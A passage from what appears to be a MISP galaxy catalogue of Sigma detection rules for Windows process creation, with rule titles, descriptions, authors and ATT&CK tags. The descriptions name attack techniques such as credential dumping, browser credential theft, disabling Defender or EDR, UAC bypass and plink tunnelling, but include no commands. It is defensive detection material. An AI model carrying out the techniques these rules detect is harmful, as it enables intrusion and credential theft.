UUID bcfece3d-56fe-4545-9931-3b8e92927db1 which can be used as unique global reference for Winrs Local Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Liran Ravich, Nasreddine Bencherchali
creation_date 2025-10-22
falsepositive ['Unlikely']
filename proc_creation_win_winrs_local_command_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.defense-evasion', 'attack.t1021.006', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Ping/Copy Command Combination

Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.

Internal MISP references

UUID ded2b07a-d12f-4284-9b76-653e37b6c8b0 which can be used as unique global reference for Potentially Suspicious Ping/Copy Command Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023-07-18
falsepositive ['Unknown']
filename proc_creation_win_cmd_ping_copy_combined_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Potential Configuration And Service Reconnaissance Via Reg.EXE

Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.

Internal MISP references

UUID 970007b7-ce32-49d0-a4a4-fbef016950bd which can be used as unique global reference for Potential Configuration And Service Reconnaissance Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019-10-21
falsepositive ['Discord']
filename proc_creation_win_reg_query_registry.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1012', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Renamed AdFind Execution

Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.

Internal MISP references

UUID df55196f-f105-44d3-a675-e9dfb6cc2f2b which can be used as unique global reference for Renamed AdFind Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-08-21
falsepositive ['Unknown']
filename proc_creation_win_renamed_adfind.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.002']
Related clusters

To see the related clusters, click here.

Procdump Execution

Detects usage of the SysInternals Procdump utility

Internal MISP references

UUID 2e65275c-8288-4ab4-aeb7-6274f58b6b20 which can be used as unique global reference for Procdump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-08-16
falsepositive ['Legitimate use of procdump by a developer or administrator']
filename proc_creation_win_sysinternals_procdump.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036', 'attack.t1003.001', 'attack.credential-access']
Related clusters

To see the related clusters, click here.

Potential Suspicious Registry File Imported Via Reg.EXE

Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility

Internal MISP references

UUID 62e0298b-e994-4189-bc87-bc699aa62d97 which can be used as unique global reference for Potential Suspicious Registry File Imported Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022-08-01
falsepositive ['Legitimate import of keys']
filename proc_creation_win_reg_import_from_suspicious_paths.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1112', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

Windows Hotfix Updates Reconnaissance Via Wmic.EXE

Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts

Internal MISP references

UUID dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45 which can be used as unique global reference for Windows Hotfix Updates Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-20
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_hotfix.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Execution of plink to perform data exfiltration and tunneling

Internal MISP references

UUID f38ce0b9-5e97-4b47-a211-7dc8d8b871da which can be used as unique global reference for Potential RDP Tunneling Via Plink in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-08-04
falsepositive ['Unknown']
filename proc_creation_win_plink_susp_tunneling.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Renamed Cloudflared.EXE Execution

Detects the execution of a renamed "cloudflared" binary.

Internal MISP references

UUID e0c69ebd-b54f-4aed-8ae3-e3467843f3f0 which can be used as unique global reference for Renamed Cloudflared.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-12-20
falsepositive ['Unknown']
filename proc_creation_win_renamed_cloudflared.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

FileFix - Suspicious Child Process from Browser File Upload Abuse

Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique, where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.

Internal MISP references

UUID 4be03877-d5b6-4520-85c9-a5911c0a656c which can be used as unique global reference for FileFix - Suspicious Child Process from Browser File Upload Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author 0xFustang
creation_date 2025-06-26
falsepositive ['Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools']
filename proc_creation_win_filefix_browsers.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1204.004']
Related clusters

To see the related clusters, click here.

Potential Adplus.EXE Abuse

Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.

Internal MISP references

UUID 2f869d59-7f6a-4931-992c-cce556ff2d53 which can be used as unique global reference for Potential Adplus.EXE Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-09
falsepositive ['Legitimate usage of Adplus for debugging purposes']
filename proc_creation_win_adplus_memory_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

PrintBrm ZIP Creation of Extraction

Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.

Internal MISP references

UUID cafeeba3-01da-4ab4-b6c4-a31b1d9730c7 which can be used as unique global reference for PrintBrm ZIP Creation of Extraction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-05-02
falsepositive ['Unknown']
filename proc_creation_win_lolbin_printbrm.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105', 'attack.defense-evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

File Decryption Using Gpg4win

Detects usage of Gpg4win to decrypt files

Internal MISP references

UUID 037dcd71-33a8-4392-bb01-293c94663e5a which can be used as unique global reference for File Decryption Using Gpg4win in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-09
falsepositive ['Unknown']
filename proc_creation_win_gpg4win_decryption.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Remote Access Tool - LogMeIn Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID d85873ef-a0f8-4c48-a53a-6b621f11729d which can be used as unique global reference for Remote Access Tool - LogMeIn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-11
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_logmein.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Potential Mftrace.EXE Abuse

Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.

Internal MISP references

UUID 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e which can be used as unique global reference for Potential Mftrace.EXE Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-09
falsepositive ['Legitimate use for tracing purposes']
filename proc_creation_win_mftrace_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Sticky Key Like Backdoor Execution

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

Internal MISP references

UUID 2fdefcb3-dbda-401e-ae23-f0db027628bc which can be used as unique global reference for Sticky Key Like Backdoor Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
creation_date 2018-03-15
falsepositive ['Unlikely']
filename proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.008', 'car.2014-11-003', 'car.2014-11-008']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Attempt Using New NetworkProvider - CLI

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

Internal MISP references

UUID baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 which can be used as unique global reference for Potential Credential Dumping Attempt Using New NetworkProvider - CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-23
falsepositive ['Other legitimate network providers used and not filtred in this rule']
filename proc_creation_win_registry_new_network_provider.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Password Set to Never Expire via WMI

Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.

Internal MISP references

UUID 7864a175-3654-4824-9f0d-f0da18ab27c0 which can be used as unique global reference for Password Set to Never Expire via WMI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Koifman (KoifSec)
creation_date 2025-07-30
falsepositive ['Legitimate administrative activity']
filename proc_creation_win_wmi_password_never_expire.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1047', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Potential Discovery Activity Via Dnscmd.EXE

Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.

Internal MISP references

UUID b6457d63-d2a2-4e29-859d-4e7affc153d1 which can be used as unique global reference for Potential Discovery Activity Via Dnscmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022-07-31
falsepositive ['Legitimate administration use']
filename proc_creation_win_dnscmd_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution']

Potential Renamed Rundll32 Execution

Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection

Internal MISP references

UUID 2569ed8c-1147-498a-9b8c-2ad3656b10ed which can be used as unique global reference for Potential Renamed Rundll32 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-22
falsepositive ['Unlikely']
filename proc_creation_win_renamed_rundll32_dllregisterserver.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

File Download Via InstallUtil.EXE

Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"

Internal MISP references

UUID 75edd216-1939-4c73-8d61-7f3a0d85b5cc which can be used as unique global reference for File Download Via InstallUtil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-19
falsepositive ['Unknown']
filename proc_creation_win_installutil_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Logged-On User Password Change Via Ksetup.EXE

Detects password change for the logged-on user's via "ksetup.exe"

Internal MISP references

UUID c9783e20-4793-4164-ba96-d9ee483992c4 which can be used as unique global reference for Logged-On User Password Change Via Ksetup.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-04-06
falsepositive ['Unknown']
filename proc_creation_win_ksetup_password_change_user.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Potential Browser Data Stealing

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

Internal MISP references

UUID 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b which can be used as unique global reference for Potential Browser Data Stealing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-12-23
falsepositive ['Unknown']
filename proc_creation_win_susp_copy_browser_data.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

RDP Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule

Internal MISP references

UUID 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 which can be used as unique global reference for RDP Port Forwarding Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community
creation_date 2019-01-29
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_port_forwarding_3389.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.defense-evasion', 'attack.command-and-control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Disable Windows Defender AV Security Monitoring

Detects attackers attempting to disable Windows Defender using Powershell

Internal MISP references

UUID a7ee1722-c3c5-aeff-3212-c777e4733217 which can be used as unique global reference for Disable Windows Defender AV Security Monitoring in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author ok @securonix invrep-de, oscd.community, frack113
creation_date 2020-10-12
falsepositive ['Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.']
filename proc_creation_win_powershell_disable_defender_av_security_monitoring.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

LSA PPL Protection Disabled Via Reg.EXE

Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process

Internal MISP references

UUID 8c0eca51-0f88-4db2-9183-fdfb10c703f9 which can be used as unique global reference for LSA PPL Protection Disabled Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-03-22
falsepositive ['Unlikely']
filename proc_creation_win_reg_lsa_ppl_protection_disabled.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.010']
Related clusters

To see the related clusters, click here.

Sysinternals PsSuspend Suspicious Execution

Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses

Internal MISP references

UUID 4beb6ae0-f85b-41e2-8f18-8668abc8af78 which can be used as unique global reference for Sysinternals PsSuspend Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-03-23
falsepositive ['Unlikely']
filename proc_creation_win_sysinternals_pssuspend_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

AspNetCompiler Execution

Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.

Internal MISP references

UUID a01b8329-5953-4f73-ae2d-aa01e1f35f00 which can be used as unique global reference for AspNetCompiler Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-24
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_exectuion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Devtoolslauncher.exe Executes Specified Binary

The Devtoolslauncher.exe executes other binary

Internal MISP references

UUID cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6 which can be used as unique global reference for Devtoolslauncher.exe Executes Specified Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community (rule), @_felamos (idea)
creation_date 2019-10-12
falsepositive ['Legitimate use of devtoolslauncher.exe by legitimate user']
filename proc_creation_win_lolbin_devtoolslauncher.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

UAC Bypass via Windows Firewall Snap-In Hijack

Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in

Internal MISP references

UUID e52cb31c-10ed-4aea-bcb7-593c9f4a315b which can be used as unique global reference for UAC Bypass via Windows Firewall Snap-In Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022-09-27
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate

Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.

Internal MISP references

UUID 41f407b5-3096-44ea-a74f-96d04fbc41be which can be used as unique global reference for Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-02-08
falsepositive ['Unlikely']
filename proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.initial-access']

Csc.EXE Execution Form Potentially Suspicious Parent

Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.

Internal MISP references

UUID b730a276-6b63-41b8-bcf8-55930c8fc6ee which can be used as unique global reference for Csc.EXE Execution Form Potentially Suspicious Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2019-02-11
falsepositive ['Unknown']
filename proc_creation_win_csc_susp_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007', 'attack.defense-evasion', 'attack.t1218.005', 'attack.t1027.004']
Related clusters

To see the related clusters, click here.

HackTool - SharpMove Tool Execution

Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.

Internal MISP references

UUID 055fb54c-a8f4-4aee-bd44-f74cf30a0d9d which can be used as unique global reference for HackTool - SharpMove Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Luca Di Bartolomeo (CrimpSec)
creation_date 2024-01-29
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpmove.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Desktop Background Change Using Reg.EXE

Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

Internal MISP references

UUID 8cbc9475-8d05-4e27-9c32-df960716c701 which can be used as unique global reference for Potentially Suspicious Desktop Background Change Using Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stephen Lincoln @slincoln-aiq (AttackIQ)
creation_date 2023-12-21
falsepositive ['Administrative scripts that change the desktop background to a company logo or other image.']
filename proc_creation_win_reg_desktop_background_change.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.impact', 'attack.t1112', 'attack.t1491.001']
Related clusters

To see the related clusters, click here.

Use of VisualUiaVerifyNative.exe

VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.

Internal MISP references

UUID b30a8bc5-e21b-4ca2-9420-0a94019ac56a which can be used as unique global reference for Use of VisualUiaVerifyNative.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022-06-01
falsepositive ['Legitimate testing of Microsoft UI parts.']
filename proc_creation_win_lolbin_visualuiaverifynative.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PsExec Service Child Process Execution as LOCAL SYSTEM

Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)

Internal MISP references

UUID 7c0dcd3d-acf8-4f71-9570-f448b0034f94 which can be used as unique global reference for PsExec Service Child Process Execution as LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension']
filename proc_creation_win_sysinternals_psexesvc_as_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Computer System Reconnaissance Via Wmic.EXE

Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.

Internal MISP references

UUID 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f which can be used as unique global reference for Computer System Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-08
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_computersystem.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Processes Spawned by ConHost

Detects suspicious child processes related to Windows Shell utilities spawned by conhost.exe, which could indicate malicious activity using trusted system components.

Internal MISP references

UUID dfa03a09-8b92-4d83-8e74-f72839b1c407 which can be used as unique global reference for Potentially Suspicious Child Processes Spawned by ConHost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-02-05
falsepositive ['Legitimate administrative tasks using conhost.exe to spawn child processes such as cmd.exe, powershell.exe, or regsvr32.exe.']
filename proc_creation_win_conhost_susp_winshell_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1202', 'attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

HackTool - Impersonate Execution

Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively

Internal MISP references

UUID cf0c254b-22f1-4b2b-8221-e137b3c0af94 which can be used as unique global reference for HackTool - Impersonate Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti @pulisettis
creation_date 2022-12-21
falsepositive ['Unknown']
filename proc_creation_win_hktl_impersonate.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1134.001', 'attack.t1134.003']
Related clusters

To see the related clusters, click here.

Potential Process Execution Proxy Via CL_Invocation.ps1

Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"

Internal MISP references

UUID a0459f02-ac51-4c09-b511-b8c9203fc429 which can be used as unique global reference for Potential Process Execution Proxy Via CL_Invocation.ps1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
creation_date 2020-10-14
falsepositive ['Unknown']
filename proc_creation_win_powershell_cl_invocation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Hacktool - EDR-Freeze Execution

Detects execution of EDR-Freeze, a tool that exploits the MiniDumpWriteDump function and WerFaultSecure.exe to suspend EDR and Antivirus processes on Windows. EDR-Freeze leverages a race-condition attack to put security processes into a dormant state by suspending WerFaultSecure at the moment it freezes the target process. This technique does not require kernel-level exploits or BYOVD, but instead abuses user-mode functionality to temporarily disable monitoring by EDR or Antimalware solutions.

Internal MISP references

UUID c598cc0c-9e70-4852-b9eb-8921af79f598 which can be used as unique global reference for Hacktool - EDR-Freeze Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-09-24
falsepositive ['Unlikely']
filename proc_creation_win_hktl_edr_freeze.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Sysinternals PsService Execution

Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering

Internal MISP references

UUID 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f which can be used as unique global reference for Sysinternals PsService Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-16
falsepositive ['Legitimate use of PsService by an administrator']
filename proc_creation_win_sysinternals_psservice.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.discovery', 'attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of ClickOnce Application

Detects potentially suspicious child processes of a ClickOnce deployment application

Internal MISP references

UUID 67bc0e75-c0a9-4cfc-8754-84a505b63c04 which can be used as unique global reference for Potentially Suspicious Child Process Of ClickOnce Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-06-12
falsepositive ['Unknown']
filename proc_creation_win_dfsvc_suspicious_child_processes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion']

PUA - NimScan Execution

Detects usage of NimScan, a portscanner utility. In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment. This rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.

Internal MISP references

UUID 4fd6b1c7-19b8-4488-97f6-00f0924991a3 which can be used as unique global reference for PUA - NimScan Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-02-05
falsepositive ['Legitimate administrator activity']
filename proc_creation_win_pua_nimscan.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Suspicious Execution of Shutdown

Use of the commandline to shutdown or reboot windows

Internal MISP references

UUID 34ebb878-1b15-4895-b352-ca2eeb99b274 which can be used as unique global reference for Suspicious Execution of Shutdown in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-01
falsepositive ['Unknown']
filename proc_creation_win_shutdown_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1529']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of DiskShadow.EXE

Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.

Internal MISP references

UUID 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 which can be used as unique global reference for Potentially Suspicious Child Process Of DiskShadow.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-09-15
